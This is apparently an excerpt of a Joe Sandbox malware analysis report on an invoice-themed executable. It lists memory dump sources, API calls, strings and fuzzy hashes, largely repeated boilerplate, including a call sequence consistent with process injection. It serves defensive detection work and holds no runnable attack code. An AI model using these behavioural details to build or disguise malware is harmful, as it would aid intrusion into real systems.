                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                              • String ID: @EXITCODE
                              • API String ID: 2734553683-3436989551
                              • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                              • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                              Strings
                              • C:\Users\user\Desktop\Revised Invoice H000127896.exe, xrefs: 00410107
                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _strcat
                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Revised Invoice H000127896.exe
                              • API String ID: 1765576173-1552892045
                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 1794320848-0
                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process$CurrentTerminate
                              • String ID:
                              • API String ID: 2429186680-0
                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                              APIs
                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: IconNotifyShell_
                              • String ID:
                              • API String ID: 1144537725-0
                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                              APIs
                              • _malloc.LIBCMT ref: 0043214B
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _malloc.LIBCMT ref: 0043215D
                              • _malloc.LIBCMT ref: 0043216F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID:
                              • API String ID: 680241177-0
                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                              APIs
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekTranslate
                              • String ID:
                              • API String ID: 4217535847-0
                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                              • Opcode Fuzzy Hash: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                              APIs
                              • __wsplitpath.LIBCMT ref: 004678F7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLast__wsplitpath_malloc
                              • String ID:
                              • API String ID: 4163294574-0
                              • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                              • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                              • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                              • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                              APIs
                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                              • _strcat.LIBCMT ref: 0040F786
                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                              • String ID:
                              • API String ID: 3199840319-0
                              • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                              • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                              APIs
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FreeInfoLibraryParametersSystem
                              • String ID:
                              • API String ID: 3403648963-0
                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                              • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                              • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                              • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                              APIs
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              • __lock_file.LIBCMT ref: 00414A8D
                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                              • __fclose_nolock.LIBCMT ref: 00414A98
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                              APIs
                              • __lock_file.LIBCMT ref: 00415012
                              • __ftell_nolock.LIBCMT ref: 0041501F
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2999321469-0
                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 040A56CB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040A5761
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040A5783
                              Memory Dump Source
                              • Source File: 00000000.00000002.2071448174.00000000040A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040A3000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40a3000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                              • Instruction ID: 1669799ab55ed5cab5eee9878df3e6bbdbf7b7a2a06099f0c66fcf4ae69b14b9
                              • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                              • Instruction Fuzzy Hash: B512DE24E24658C6EB24DF60D8507DEB272FF68300F1090E9910DEB7A4E77A5E91CF5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                              • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
